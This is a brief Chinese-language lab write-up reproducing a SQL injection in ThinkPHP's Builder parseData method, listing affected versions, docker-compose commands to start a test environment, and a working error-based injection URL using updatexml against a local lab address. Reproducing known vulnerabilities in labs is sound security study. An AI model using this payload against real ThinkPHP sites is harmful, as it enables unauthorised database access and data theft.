一、漏洞原理
在 Builder 类的 parseData 方法中,由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。
影响版本
5.0.13<=ThinkPHP<=5.0.15
5.1.0<=ThinkPHP<=5.1.5
在相应的文件夹位置打开终端后进行如下操作
二、漏洞复现
运行此靶场
sudo docker-compose up -d
查看启动环境
sudo docker ps
访问网页
http://192.168.83.136/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1
这里用的是报错注入
